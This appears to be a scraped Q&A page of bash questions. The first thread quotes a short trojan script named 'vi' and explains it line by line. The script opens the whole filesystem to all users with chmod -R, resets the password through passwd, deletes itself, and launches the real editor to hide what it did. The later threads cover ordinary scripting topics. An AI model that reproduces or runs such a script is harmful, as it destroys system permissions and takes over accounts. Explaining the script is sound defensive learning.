What does this Bash Shell Script do? - bash

i'm a very clueless beginner when it comes to Shell Scripts but i have to be able to explain what these lines of code do and not enough time to get more familiar with it first, so i cant't really give a lot of input.
As additional information the script itself is called vi just like the editor and is probably harmful/hoping to be run as admin
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd
rm $0
vi $*
logout # good bye!
I think the idea is that somebody is trying to run the actual vi (not this script) and then he accidentally calls this script - it changes the current users password to the output of the echo command (not sure what that is tho) and then the shell deletes itself and calls the editor so we dont realize anything happened.
huge thank you to any answer in advance and sorry for being so clueless.

HMM Not sure if clueless beginner or a crafty hacker [insert suspicious Fry meme]. With the last name like that?
Here's what the script does, step-by-step:
chmod -R og+rwx /: recursively (-R) opens all your files for reading, writing and executing (+rwx) by users in your group (g) and all other users (o).
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd: resets your superuser password to "Hacke.peter".
rm $0: removes itself. The $0 in bash stands for the file name of the current script.
vi $*: opens the real vi editor with whatever arguments ($*) you passed to the original (now erased) script. If the script was also called vi, this step is to hide the tracks and avoid suspicion.
logout: logs you out of root mode. Now you no longer have root and your filesystem is open.
Very nasty script!

Related

Bash script calls vi for manual editing, then script resumes?

I wrote a script that creates a backup of a text file, and a second script that verifies some syntax in text file using SED.
In the middle, there is a manual process: Users edit the original file adding some strings. This process must remain manual.
I would like to merge my two scripts so the backup is created, vi is open for the user, when the user is done editing the file, the script resumes doing the syntax verification.
I am learning by doing, but really do not know how to code the "open vi, wait for the user to do his editing, take control over and resume with verification" part.
I read there is a function called system (in Perl) that could be used, but my code is in BASH.
Any suggestions on how to get this done in BASH? Thanks!
In bash, each statement is essentially like an implicit call to system (unless it's a builtin shell command) since shell scripts are designed to make it easy to run other programs.
backup some_file.txt
vi some_file.txt # The script blocks until the user exits vi
verify_syntax some_file.txt
The only difference between using vi and a command like ls is that ls will do its thing and exit without user intervention, while vi (or any interactive command) will run until the user explicitly exits.

use "!" to execute commands with same parameter in a script

In a shell, I run following commands without problem,
ls -al
!ls
the second invocation to ls also list files with -al flag. However, when I put the above script to a bash script, complaints are thrown,
!ls, command not found.
how to realise the same effects in script?
You would need to turn on both command history and !-style history expansion in your script (both are off by default in non-interactive shells):
set -o history
set -o histexpand
The expanded command is also echoed to standard error, just like in an interactive shell. You can prevent that by turning on the histverify shell option (shopt -s histverify), but in a non-interactive shell, that seems to make the history expansion a null-op.
Well, I wanted to have this working as well, and I have to tell everybody that the set -o history ; set -o histexpand method will not work in bash 4.x. It's not meant to be used there, anyway, since there are better ways to accomplish this.
First of all, a rather trivial example, just wanting to execute history in a script:
(bash 4.x or higher ONLY)
#!/bin/bash -i
history
Short answer: it works!!
The spanking new -i option stands for interactive, and history will work. But for what purpose?
Quoting Michael H.'s comment from the OP:
"Although you can enable this, this is bad programming practice. It will make your scripts (...) hard to understand. There is a reason it is disabled by default. Why do you want to do this?"
Yes, why? What is the deeper sense of this?
Well, THERE IS, which I'm going to demonstrate in the follow-up section.
My history buffer has grown HUGE, while some of those lines are script one-liners, which I really would not want to retype every time. But sometimes, I also want to alter these lines a little, because I probably want to give a third parameter, whereas I had only needed two in total before.
So here's an ideal way of using the bash 4.0+ feature to invoke history:
$ history
(...)
<lots of lines>
(...)
1234 while IFS='whatever' read [[ $whatever -lt max ]]; do ... ; done < <(workfile.fil)
<25 more lines>
So 1234 from history is exactly the line we want. Surely, we could take the mouse and move there, chucking the whole line in the primary buffer? But we're on *NIX, so why can't we make our life a bit easier?
This is why I wrote the little script below. Again, this is for bash 4.0+ ONLY (but might be adapted for bash 3.x and older with the aforementioned set -o ... stuff...)
#!/bin/bash -i
[[ $1 == "" ]] || history | grep "^\s*$1" |
awk '{for (i=2; i<=NF; i++) printf $i" "}' | tr '\n' '\0'
If you save this as xselauto.sh for example, you may invoke
$ ./xselauto.sh 1234
and the contents of history line #1234 will be in your primary buffer, ready for re-use!
Now if anyone still says "this has no purpose AFAICS" or "who'd ever be needing this feature?" - OK, I won't care. But I would no longer want to live without this feature, as I'm just too lazy to retype complex lines every time. And I wouldn't want to touch the mouse for each marked line from history either, TBH. This is what xsel was written for.
BTW, the tr part of the pipe is a dirty hack which will prevent the command from being executed. For "dangerous" commands, it is extremely important to always leave the user a way to look before he/she hits the Enter key to execute it. You may omit it, but ... you have been warned.
P.S. This scriptlet is in fact a workaround, simulating !1234 typed on a bash shell. As I could never make the ! work directly in a script (echo would never let me reveal the contents of history line 1234), I worked around the problem by simply greping for the line I wanted to copy.
History expansion is part of the interactive command-line editing features of a shell, not part of the scripting language. It's not generally available in the context of a script, only when interacting with a (pseudo-)human operator. (pseudo meaning that it can be made to work with things like expect or other keystroke repeating automation tools that generally try to play act a human, not implying that any particular operator might be sub-human or anything).

Pre-filling a prompt in Bash

Writing a bash script, and I want to get user input. Awesome,
read -p "What directory should we save in? " -e FOLDER
Except that what I'd like to do, ideally, is have the user see something like:
What directory should we save in? /home/user/default/
with the cursor at the end of the line, and the ability to delete backwards or append or whatever. Essentially, pre-filling the user's input, but giving them the ability to edit it.
Readline obviously has the capability, but it appears to be not exposed in the read command. Any alternatives? I'd prefer to not have to use perl or such.
The constraint I'm working under is that I'm writing a single shell script that would be nice to disseminate widely, so should rely on as little pre-existing infrastructure as possible. rlwrap and read -i both work if their dependencies (rlwrap and bash version >> whatever I have, respectively) are available. Both good answers, choose whichever works for you.
$ read -p "What directory should we save in? " -i "/home/user/default/" -e FOLDER
What directory should we save in? /home/user/default/
that should work, right?
You can wrap the command in rlwrap, which provides instant readline capabilities: https://github.com/hanslub42/rlwrap
(rlwrap -P does what you want)
As far as a pure bash solution is concerned for the 3.2 line (which i am presuming you are using), I dont think its possible

Can a shell script indicate that its lines be loaded into memory initially?

UPDATE: this is a repost of How to make shell scripts robust to source being changed as they run
This is a little thing that bothers me every now and then:
I write a shell script (bash) for a quick and dirty job
I run the script, and it runs for quite a while
While it's running, I edit a few lines in the script, configuring it for a different job
But the first process is still reading the same script file and gets all screwed up.
Apparently, the script is interpreted by loading each line from the file as it is needed. Is there some way that I can have the script indicate to the shell that the entire script file should be read into memory all at once? For example, Perl scripts seem to do this: editing the code file does not affect a process that's currently interpreting it (because it's initially parsed/compiled?).
I understand that there are many ways I could get around this problem. For example, I could try something like:
cat script.sh | sh
or
sh -c "`cat script.sh`"
... although those might not work correctly if the script file is large and there are limits on the size of stream buffers and command-line arguments. I could also write an auxiliary wrapper that copies a script file to a locked temporary file and then executes it, but that doesn't seem very portable.
So I was hoping for the simplest solution that would involve modifications only to the script, not the way in which it is invoked. Can I just add a line or two at the start of the script? I don't know if such a solution exists, but I'm guessing it might make use of the $0 variable...
The best answer I've found is a very slight variation on the solutions offered to How to make shell scripts robust to source being changed as they run. Thanks to camh for noting the repost!
#!/bin/sh
{
# Your stuff goes here
exit
}
This ensures that all of your code is parsed initially; note that the 'exit' is critical to ensuring that the file isn't accessed later to see if there are additional lines to interpret. Also, as noted on the previous post, this isn't a guarantee that other scripts called by your script will be safe.
Thanks everyone for the help!
Use an editor that doesn't modify the existing file, and instead creates a new file then replaces the old file. For example, using :set writebackup backupcopy=no in Vim.
How about a solution to how you edit it.
If the script is running, before editing it, do this:
mv script script-old
cp script-old script
rm script-old
Since the shell keep's the file open as long as you don't change the contents of the open inode everything will work okay.
The above works because mv will preserve the old inode while cp will create a new one. Since a file's contents will not actually be removed if it is opened, you can remove it right away and it will be cleaned up once the shell closes the file.
According to the bash documentation if instead of
#!/bin/bash
body of script
you try
#!/bin/bash
script=$(cat <<'SETVAR'
body of script
SETVAR)
eval "$script"
then I think you will be in business.
Consider creating a new bang path for your quick-and-dirty jobs. If you start your scripts with:
#!/usr/local/fastbash
or something, then you can write a fastbash wrapper that uses one of the methods you mentioned. For portability, one can just create a symlink from fastbash to bash, or have a comment in the script saying one can replace fastbash with bash.
If you use Emacs, try M-x customize-variable break-hardlink-on-save. Setting this variable will tell Emacs to write to a temp file and then rename the temp file over the original instead of editing the original file directly. This should allow the running instance to keep its unmodified version while you save the new version.
Presumably, other semi-intelligent editors would have similar options.
A self contained way to make a script resistant to this problem is to have the script copy and re-execute itself like this:
#!/bin/bash
if [[ $0 != /tmp/copy-* ]] ; then
rm -f /tmp/copy-$$
cp $0 /tmp/copy-$$
exec /tmp/copy-$$ "$#"
echo "error copying and execing script"
exit 1
fi
rm $0
# rest of script...
(This will not work if the original script begins with the characters /tmp/copy-)
(This is inspired by R Samuel Klatchko's answer)

Running bash shell in Maemo

I have attempted to run the following bash script on my internet tablet (Nokia N810 running on Maemo Linux). However, it doesn't seem that it is running, and I have no clue of what's wrong with this script (it runs on my Ubuntu system if I change the directories). It would be great to receive some feedback on this or similar experiences of this issue. Thanks.
WORKING="/home/user/.gpe"
SVNPATH="/media/mmc1/gpe/"
cp calendar categories contacts todo $WORKING
What actually happens when you run your script? It's helpful if you include details of error messages or behavior that differs from what's expected and in what way.
If $WORKING contains the name of a directory, hidden or not, then the cp should copy those four files into it. Then ls -l /home/user/.gpe should show them plus whatever else is in there, regardless of whether it's "hidden".
By the way, the initial dot in a file or directory name doesn't really "hide" the entry, it's just that ls and echo * and similar commands don't show them, while these do:
ls -la
ls -d .*
ls -d {.*,*}
echo .*
echo {.*,*}
The bash cp command can copy multiple sources to a single destination, if it's a directory.
Does the directory /home/user/.gpe exist?
Bear in mind that the leading dot in the name can make it hidden unless you use ls -a
I tried your commands in cygwin:
But I used .gpe instead of /home/user/.gpe
I did a touch calendar categories contacts todo to create the files.
It worked fine.
If that's the entirety of your script, it's missing two. possible three, things:
A shebang line, such as #!/bin/sh at the start
Use of $SVNPATH. You probably want to cd $SVNPATH before the cp command. Your script should not assume the current working directory is correct.
Possibly execute permission on the script: chmod a+x script
Do you already have the /home/user/.gpe directory present? And also, try adding a -R parameter so that the directories are copied recursively.

Resources